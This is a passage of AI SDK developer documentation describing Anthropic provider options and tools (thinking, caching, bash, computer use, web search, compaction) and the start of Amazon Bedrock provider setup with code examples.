  Optional. See the Effort section for more details.
- taskBudget object
  Optional. See the Task Budgets section for more details.
- speed "fast" | "standard"
  Optional. See the Fast Mode section for more details.
- inferenceGeo "us" | "global"
  Optional. See the Data Residency section for more details.
- thinking object
  Optional. See the Reasoning section for more details.
- toolStreaming boolean
  Whether to enable tool streaming (and structured output streaming). Defaults to true.
- structuredOutputMode "outputFormat" | "jsonTool" | "auto"
  Optional. Determines how structured outputs are generated (see the sketch after this list).
  - "outputFormat": Use the output_format parameter to specify the structured output format.
  - "jsonTool": Use a special "json" tool to specify the structured output format (default).
  - "auto": Use "outputFormat" when supported, otherwise fall back to "jsonTool".
- metadata object
  Optional. Metadata to include with the request. See the Anthropic API documentation for details.
  - userId string - An external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.
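For example, a sketch of forcing the output_format mode for structured outputs:
import { anthropic } from '@ai-sdk/anthropic';
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
  model: anthropic('claude-sonnet-4-20250514'),
  schema: z.object({ summary: z.string() }),
  prompt: 'Summarize: the quick brown fox jumps over the lazy dog.',
  providerOptions: {
    anthropic: {
      structuredOutputMode: 'outputFormat', // use output_format instead of the json tool
    },
  },
});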
Structured Outputs and Tool Input Streaming
By default, the Anthropic API returns streaming tool calls and structured outputs all at once after a delay. To enable incremental streaming of tool inputs (when using streamText with tools) and structured outputs (when using streamObject), you need to set the anthropic-beta header to fine-grained-tool-streaming-2025-05-14.
For structured outputs with streamObject:
import { anthropic } from '@ai-sdk/anthropic';
import { streamObject } from 'ai';
import { z } from 'zod';
const result = streamObject({
model: anthropic('claude-sonnet-4-20250514'),
schema: z.object({
characters: z.array(
z.object({
name: z.string(),
class: z.string(),
description: z.string(),
}),
),
}),
prompt: 'Generate 3 character descriptions for a fantasy role playing game.',
headers: {
'anthropic-beta': 'fine-grained-tool-streaming-2025-05-14',
},
});
for await (const partialObject of result.partialObjectStream) {
console.log(partialObject);
}
For tool input streaming with streamText:
import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
tools: {
writeFile: tool({
description: 'Write content to a file',
inputSchema: z.object({
path: z.string(),
content: z.string(),
}),
execute: async ({ path, content }) => {
// Implementation
return { success: true };
},
}),
},
prompt: 'Write a short story to story.txt',
headers: {
'anthropic-beta': 'fine-grained-tool-streaming-2025-05-14',
},
});
Without this header, tool inputs and structured outputs may arrive all at once after a delay instead of streaming incrementally.
Effort
Anthropic introduced an effort option with claude-opus-4-5 that affects thinking, text responses, and function calls. Effort defaults to high and you can set it to medium or low to save tokens and to lower time-to-last-token latency (TTLT). claude-opus-4-7 additionally supports xhigh for maximum reasoning effort.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: anthropic('claude-opus-4-5'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
effort: 'low',
} satisfies AnthropicProviderOptions,
},
});
console.log(text); // resulting text
console.log(usage); // token usage
Fast Mode
Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Write a short poem about the sea.',
providerOptions: {
anthropic: {
speed: 'fast',
} satisfies AnthropicProviderOptions,
},
});
The speed option accepts 'fast' or 'standard' (default behavior).
Data Residency
Anthropic supports an inferenceGeo option that controls where model inference runs for a request.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Summarize the key points of this document.',
providerOptions: {
anthropic: {
inferenceGeo: 'us',
} satisfies AnthropicProviderOptions,
},
});
The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).
Task Budgets
claude-opus-4-7 supports a taskBudget option that informs the model of the total token budget available for an agentic turn. The model uses this information to prioritize work, plan ahead, and wind down gracefully as the budget is consumed.
Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-7'),
prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
providerOptions: {
anthropic: {
taskBudget: {
type: 'tokens',
total: 400000,
},
} satisfies AnthropicProviderOptions,
},
});
For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:
taskBudget: {
type: 'tokens',
total: 400000,
remaining: 215000, // budget left after prior compacted-away contexts
}
The taskBudget object accepts:
- type "tokens" - Budget type. Currently only "tokens" is supported.
- total number - Total task budget for the agentic turn. Minimum 20,000.
- remaining number - Budget left after prior compacted-away contexts. Must be between 0 and total. Defaults to total if omitted.
Reasoning
Anthropic has reasoning support for claude-opus-4-20250514, claude-sonnet-4-20250514, and claude-3-7-sonnet-20250219 models.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
} satisfies AnthropicProviderOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
effort: 'max', // 'low' | 'medium' | 'high' | 'xhigh' | 'max'
} satisfies AnthropicProviderOptions,
},
});
Thinking Display (Opus 4.7+)
Starting with claude-opus-4-7, thinking content is omitted from the response by default — thinking blocks are present in the stream but their text is empty. To receive reasoning output, set display: 'summarized':
const { text, reasoningText } = await generateText({
model: anthropic('claude-opus-4-7'),
providerOptions: {
anthropic: {
thinking: { type: 'adaptive', display: 'summarized' },
} satisfies AnthropicProviderOptions,
},
prompt: 'How many people will live in the world in 2040?',
});
console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);
Budget-Based Thinking
For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929),
use type: 'enabled' with an explicit token budget:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-5-20250929'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText and generateObject, again under the anthropic property.
When you use streamText or streamObject, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118 }
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
Cache control for tools:
const result = await generateText({
model: anthropic('claude-3-5-haiku-latest'),
tools: {
cityAttractions: tool({
inputSchema: z.object({ city: z.string() }),
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral' },
},
},
}),
},
messages: [
{
role: 'user',
content: 'User prompt',
},
],
});
Longer cache TTL
Anthropic also supports a longer 1-hour cache duration.
Here's an example:
const result = await generateText({
model: anthropic('claude-3-5-haiku-latest'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Long cached message',
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral', ttl: '1h' },
},
},
},
],
},
],
});
Limitations
The minimum cacheable prompt length is:
- 1024 tokens for Claude 3.7 Sonnet, Claude 3.5 Sonnet and Claude 3 Opus
- 2048 tokens for Claude 3.5 Haiku and Claude 3 Haiku
Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.
For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = anthropic.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
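One possible execute implementation is an unsandboxed sketch using Node's child_process (this assumes a plain-string result is acceptable to the tool; only run model-generated commands inside a sandbox in practice):
import { exec } from 'node:child_process';
import { promisify } from 'node:util';
const execAsync = promisify(exec);
const bashTool = anthropic.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    if (restart) {
      // this stateless sketch has nothing to restart
      return 'tool restarted';
    }
    const { stdout, stderr } = await execAsync(command, { timeout: 30_000 });
    return stdout + (stderr ? `\n${stderr}` : '');
  },
});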
Memory Tool
The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:
const memory = anthropic.tools.memory_20250818({
execute: async action => {
// Implement your memory command execution logic here
// Return the result of the command execution
},
});
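A minimal in-memory sketch follows; the command and field names below are assumptions based on Anthropic's memory tool command format:
const files = new Map<string, string>();
const memory = anthropic.tools.memory_20250818({
  execute: async (action: any) => {
    switch (action.command) {
      case 'view':
        // assumption: view actions carry a path field
        return files.get(action.path) ?? 'File not found';
      case 'create':
        // assumption: create actions carry path and file_text fields
        files.set(action.path, action.file_text ?? '');
        return `Created ${action.path}`;
      default:
        return `Unsupported command: ${action.command}`;
    }
  },
});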
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
const tools = {
// tool name must be str_replace_based_edit_tool
str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
maxCharacters: 10000, // optional
async execute({ command, path, old_str, new_str }) {
// ...
},
}),
} satisfies ToolSet;
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: `undo_edit` is only available in Claude 3.5 Sonnet and earlier models.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for `str_replace` or `insert` commands.
- `old_str` (string, optional): Required for `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for `view` command to specify line range to show.
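A minimal filesystem-backed sketch covering the view, create, and str_replace commands (error handling omitted):

import fs from 'node:fs/promises';
import type { ToolSet } from 'ai';

const tools = {
  str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
    async execute({ command, path, old_str, new_str, file_text }) {
      switch (command) {
        case 'view':
          return await fs.readFile(path, 'utf8');
        case 'create':
          await fs.writeFile(path, file_text ?? '');
          return `created ${path}`;
        case 'str_replace': {
          const content = await fs.readFile(path, 'utf8');
          await fs.writeFile(path, content.replace(old_str ?? '', new_str ?? ''));
          return `replaced text in ${path}`;
        }
        default:
          return `command not implemented in this sketch: ${command}`;
      }
    },
  }),
} satisfies ToolSet;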
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
import fs from 'fs';

const computerTool = anthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mediaType: 'image/png' }];
},
});
Parameters:
- `action` ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- `coordinate` (number[], optional): Required for `mouse_move` and `left_click_drag` actions. Specifies the (x, y) coordinates.
- `text` (string, optional): Required for `type` and `key` actions.
These tools can be used in conjunction with the claude-3-5-sonnet-20240620 model to enable more complex interactions and tasks.
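For example, a minimal sketch of wiring the tool into a generateText call (the tool key name and step limit are illustrative):

import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20240620'),
  prompt: 'Take a screenshot and describe what you see.',
  tools: {
    computer: computerTool, // the computerTool defined above
  },
  stopWhen: stepCountIs(3),
});

console.log(result.text);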
Web Search Tool
Anthropic provides a provider-defined web search tool that gives Claude direct access to real-time web content, allowing it to answer questions with up-to-date information beyond its knowledge cutoff.
You can enable web search using the provider-defined web search tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 5,
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: webSearchTool,
},
});
Configuration Options
The web search tool supports several configuration options:
- `maxUses` (number): Maximum number of web searches Claude can perform during the conversation.
- `allowedDomains` (string[]): Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
- `blockedDomains` (string[]): Optional list of domains that Claude should avoid when searching.
- `userLocation` (object): Optional user location information to provide geographically relevant search results.
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 3,
allowedDomains: ['techcrunch.com', 'wired.com'],
blockedDomains: ['example-spam-site.com'],
userLocation: {
type: 'approximate',
country: 'US',
region: 'California',
city: 'San Francisco',
timezone: 'America/Los_Angeles',
},
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Find local news about technology',
tools: {
web_search: webSearchTool,
},
});
Web Fetch Tool
Anthropic provides a provider-defined web fetch tool that allows Claude to retrieve content from specific URLs. This is useful when you want Claude to analyze or reference content from a particular webpage or document.
You can enable web fetch using the provider-defined web fetch tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-0'),
prompt:
'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
tools: {
web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
},
});
Configuration Options
The web fetch tool supports several configuration options:
- `maxUses` (number): Limits the number of web fetches performed.
- `allowedDomains` (string[]): Only fetch from these domains.
- `blockedDomains` (string[]): Never fetch from these domains.
- `citations` (object): Unlike web search, where citations are always enabled, citations are optional for web fetch. Set `citations: { enabled: true }` to enable Claude to cite specific passages from fetched documents.
- `maxContentTokens` (number): Limits the amount of content that will be included in the context.
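A sketch combining several of these options (the token limit is illustrative):

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-0'),
  prompt:
    'Summarize this page and cite it: https://en.wikipedia.org/wiki/Maglemosian_culture',
  tools: {
    web_fetch: anthropic.tools.webFetch_20250910({
      maxUses: 2,
      citations: { enabled: true }, // cite passages from fetched documents
      maxContentTokens: 4000, // cap how much fetched content enters the context
    }),
  },
});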
Error Handling
Web search errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText, generateObject):
Web search errors throw exceptions that you can catch:
try {
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
} catch (error) {
if (error.message.includes('Web search failed')) {
console.log('Search error:', error.message);
// Handle search error appropriately
}
}
Streaming (streamText, streamObject):
Web search errors are delivered as error parts in the stream:
const result = await streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
for await (const part of result.fullStream) {
if (part.type === 'error') {
console.log('Search error:', part.error);
// Handle search error appropriately
}
}
Code Execution
Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment allowing it to execute code to inform its responses.
You can enable code execution using the provider-defined code execution tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const codeExecutionTool = anthropic.tools.codeExecution_20260120();
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt:
'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
tools: {
code_execution: codeExecutionTool,
},
});
Error Handling
Code execution errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText, generateObject):
Code execution errors are delivered as tool result parts in the response:
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
const toolErrors = result.content?.filter(
content => content.type === 'tool-error',
);
toolErrors?.forEach(error => {
console.error('Tool execution error:', {
toolName: error.toolName,
toolCallId: error.toolCallId,
error: error.error,
});
});
Streaming (streamText, streamObject):
Code execution errors are delivered as error parts in the stream:
const result = await streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
for await (const part of result.fullStream) {
if (part.type === 'error') {
console.log('Code execution error:', part.error);
// Handle code execution error appropriately
}
}
Agent Skills
Anthropic Agent Skills enable Claude to perform specialized tasks like document processing (PPTX, DOCX, PDF, XLSX) and data analysis. Skills run in a sandboxed container and require the code execution tool to be enabled.
Using Built-in Skills
Anthropic provides several built-in skills:
- pptx - Create and edit PowerPoint presentations
- docx - Create and edit Word documents
- pdf - Process and analyze PDF files
- xlsx - Work with Excel spreadsheets
To use skills, you need to:
- Enable the code execution tool
- Specify the container with skills in `providerOptions`
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Create a presentation about renewable energy with 5 slides',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'anthropic',
skillId: 'pptx',
version: 'latest', // optional
},
],
},
} satisfies AnthropicProviderOptions,
},
});
Custom Skills
You can also use custom skills by specifying type: 'custom':
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Use my custom skill to process this data',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'custom',
skillId: 'my-custom-skill-id',
version: '1.0', // optional
},
],
},
} satisfies AnthropicProviderOptions,
},
});
Compaction
The compact_20260112 edit type automatically summarizes earlier conversation context when token limits are reached. This is useful for long-running conversations where you want to preserve the essence of earlier exchanges while staying within token limits.
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';
const result = streamText({
model: anthropic('claude-opus-4-6'),
messages: conversationHistory,
providerOptions: {
anthropic: {
contextManagement: {
edits: [
{
type: 'compact_20260112',
trigger: {
type: 'input_tokens',
value: 50000, // trigger compaction when input exceeds 50k tokens
},
instructions:
'Summarize the conversation concisely, preserving key decisions and context.',
pauseAfterCompaction: false,
},
],
},
} satisfies AnthropicProviderOptions,
},
});
Configuration:
- `trigger` - Condition that triggers compaction (e.g., `{ type: 'input_tokens', value: 50000 }`)
- `instructions` - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
- `pauseAfterCompaction` - When `true`, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to `false`.
When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.
Detecting Compaction in Streams
When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-start': {
const isCompaction =
part.providerMetadata?.anthropic?.type === 'compaction';
if (isCompaction) {
console.log('[COMPACTION SUMMARY START]');
}
break;
}
case 'text-delta': {
process.stdout.write(part.text);
break;
}
}
}
Compaction in UI Applications
When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:
{
message.parts.map((part, index) => {
if (part.type === 'text') {
const isCompaction =
(part.providerMetadata?.anthropic as { type?: string } | undefined)
?.type === 'compaction';
if (isCompaction) {
return (
<div
key={index}
className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
>
<span className="font-bold">[Compaction Summary]</span>
<div>{part.text}</div>
</div>
);
}
return <div key={index}>{part.text}</div>;
}
return null; // non-text parts are not rendered here
})}
PDF support
Anthropic Sonnet claude-3-5-sonnet-20241022 supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
Option 1: URL-based PDF document
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
});
Option 2: Base64-encoded PDF document
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use | Web Search | Tool Search | Compaction |
|---|---|---|---|---|---|---|---|
| `claude-opus-4-7` | | | | | | | |
| `claude-opus-4-6` | | | | | | | |
| `claude-sonnet-4-6` | | | | | | | |
| `claude-opus-4-5` | | | | | | | |
| `claude-haiku-4-5` | | | | | | | |
| `claude-sonnet-4-5` | | | | | | | |
| `claude-opus-4-1` | | | | | | | |
| `claude-opus-4-0` | | | | | | | |
| `claude-sonnet-4-0` | | | | | | | |
| `claude-3-7-sonnet-latest` | | | | | | | |
| `claude-3-5-haiku-latest` | | | | | | | |
title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.
Amazon Bedrock Provider
The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.
Setup
The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with
pnpm add @ai-sdk/amazon-bedrock
Prerequisites
Access to Amazon Bedrock foundation models isn't granted by default. In order to gain access to a foundation model, an IAM user with sufficient permissions needs to request access to it through the console. Once access is provided to a model, it is available for all users in the account.
See the Model Access Docs for more information.
Authentication
Using IAM Access Key and Secret Key
Step 1: Creating AWS Access Key and Secret Key
To get started, you'll need to create an AWS access key and secret key. Here's how:
Login to AWS Management Console
- Go to the AWS Management Console and log in with your AWS account credentials.
Create an IAM User
- Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
- Click on "Create user" and fill in the required details to create a new IAM user.
- Make sure to select "Programmatic access" as the access type.
- The user account needs the `AmazonBedrockFullAccess` policy attached to it.
Create Access Key
- Click on the "Security credentials" tab and then click on "Create access key".
- Click "Create access key" to generate a new access key pair.
- Download the `.csv` file containing the access key ID and secret access key.
Step 2: Configuring the Access Key and Secret Key
Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:
AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION
Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.
Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)
When using the AWS SDK, the SDK automatically uses the credentials chain to determine the credentials for API calls. This includes instance profiles, instance roles, ECS roles, EKS Service Accounts, etc. You can get similar behavior with the AI SDK by not specifying the accessKeyId, secretAccessKey, and sessionToken properties in the provider settings and instead passing a credentialProvider property.

The @aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain. You can install it with:

pnpm add @aws-sdk/credential-providers
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
credentialProvider: fromNodeProviderChain(),
});
Provider Instance
You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
accessKeyId: 'xxxxxxxxx',
secretAccessKey: 'xxxxxxxxx',
sessionToken: 'xxxxxxxxx',
});
You can use the following optional settings to customize the Amazon Bedrock provider instance:
- `region` (string): The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` (string): The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` (string): The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` (string, optional): The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `credentialProvider` (() => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>, optional): The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
Language Models
You can create models that call the Bedrock API using the provider instance.
The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.
const model = bedrock('meta.llama3-70b-instruct-v1:0');
Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');
await generateText({
model,
providerOptions: {
anthropic: {
additionalModelRequestFields: { top_k: 350 },
},
},
});
Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.
You can use Amazon Bedrock language models to generate text with the generateText function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Amazon Bedrock language models can also be used in the streamText function
(see AI SDK Core).
File Inputs
The Amazon Bedrock provider supports file inputs, e.g. PDF files.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the pdf in detail.' },
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
Guardrails
You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:
const result = await generateText({
model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
prompt: 'Write a story about space exploration.',
providerOptions: {
bedrock: {
guardrailConfig: {
guardrailIdentifier: '1abcd2ef34gh',
guardrailVersion: '1',
trace: 'enabled' as const,
streamProcessingMode: 'async',
},
},
},
});
Tracing information will be returned in the provider metadata if you have tracing enabled.
if (result.providerMetadata?.bedrock?.trace) {
  // inspect the guardrail trace, e.g. log it:
  console.log(JSON.stringify(result.providerMetadata.bedrock.trace, null, 2));
}
See the Amazon Bedrock Guardrails documentation for more information.
Citations
Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:
- Some models can read documents with visual understanding, not just extracting text
- Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateObject } from 'ai';
import { z } from 'zod';
import fs from 'fs';
const result = await generateObject({
model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
schema: z.object({
summary: z.string().describe('Summary of the PDF document'),
keyPoints: z.array(z.string()).describe('Key points from the PDF'),
}),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this PDF and provide key points.',
},
{
type: 'file',
data: fs.readFileSync('./document.pdf'),
mediaType: 'application/pdf',
providerOptions: {
bedrock: {
citations: { enabled: true },
},
},
},
],
},
],
});
console.log('Response:', result.object);
Cache Points
In messages, you can use the providerOptions property to set cache points. Set the bedrock property in the providerOptions object to { cachePoint: { type: 'default' } } to create a cache point.
Cache usage information is returned in the providerMetadata object. See the examples below.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'system',
